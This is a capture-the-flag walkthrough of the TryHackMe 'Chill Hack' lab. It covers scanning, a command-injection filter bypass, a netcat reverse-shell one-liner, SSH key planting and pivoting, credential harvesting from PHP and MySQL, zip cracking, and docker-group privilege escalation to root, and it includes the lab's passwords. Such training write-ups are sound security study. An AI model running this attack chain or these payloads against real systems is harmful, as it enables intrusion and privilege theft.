Chill Hack

Room Link: https://tryhackme.com/room/chillhack

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

A lot of commands ran will result in this page.

Command Injection

Used this to find a way to bypass the filter. by adding a \ in the middle of the first command, it treats the command as a new line so it allows us to run any command we want.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Web

r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.172.186 1337 >/tmp/f

Kali

nc -lvnp 1337

Victim

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
/bin/bash

Victim(apaar)

python3 -c 'import pty; pty.spawn("/bin/bash")'

Victim(apaar)

netstat -at
curl localhost:9001

Pivot

Kali

ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub

Victim

copy id_rsa.pub to /home/apaar/.ssh/authorized_keys

Kali

vi /etc/proxychains.conf

proxychains.conf

socks4 	127.0.0.1 9050

Kali

ssh -D 9050 apaar@VICTIM

I can now see the webpage from Kali but no login credentials to use.

Found credentials for mysql in one of the php files.

Victim(apaar)

cat /var/www/files/index.php

Victim(apaar)

mysql -u root -p webportal
Password: !@m+her00+@db

Victim(mysql)

SHOW DATABASES;
use webportal;
SHOW TABLES;
select * from users;

Both set of credentials work on the login page, both bring up this page.

Used no password

Kali

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

Cracking Password Protected Zip Files

Kali

zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt 

Kali

unzip backup.zip
Password: pass1word

Kali

cat source_code.php 
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

Victim(apaar)

su anurodh
Password: !d0ntKn0wmYp@ssw0rd

Privilege Escalation

anurodh is apart of a docker group which the other user was not apart of, looking at gtfo bins theres a way to get a shell so I tried it and got root

Link: https://gtfobins.github.io/gtfobins/docker/#shell

Victim(anurodh)

groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh